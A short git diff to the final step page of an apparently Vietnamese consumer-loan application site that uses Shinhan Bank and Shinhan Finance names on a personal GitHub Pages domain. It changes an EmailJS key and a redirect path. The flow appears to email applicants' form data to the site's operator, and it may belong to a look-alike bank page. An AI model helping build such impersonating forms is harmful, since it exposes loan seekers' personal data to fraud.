--- a/pages/vi/step8.html
+++ b/pages/vi/step8.html
@@ -15,7 +15,7 @@
     <script type="text/javascript">
         (function() {
             // THAY THẾ 'YOUR_PUBLIC_KEY' BẰNG PUBLIC KEY CỦA BẠN TRÊN EMAILJS
-            emailjs.init('jugdaw6sXSdJVlAlt'); 
+            emailjs.init('KJ7TlqIPf7U4cfyzQ'); 
         })();
     </script>
     
@@ -354,7 +354,7 @@ const CompletionApp = {
     init() {
         this.cacheDOMElements();
         if (!this.loadAndValidateData()) {
-            window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/step1.html';
+            window.location.href = '/shinhanfinance/pages/vi/step1.html';
             return;
         }
         
@@ -444,4 +444,5 @@ document.addEventListener('DOMContentLoaded', () => {
 </script>
 </body>
 </html>
+
 
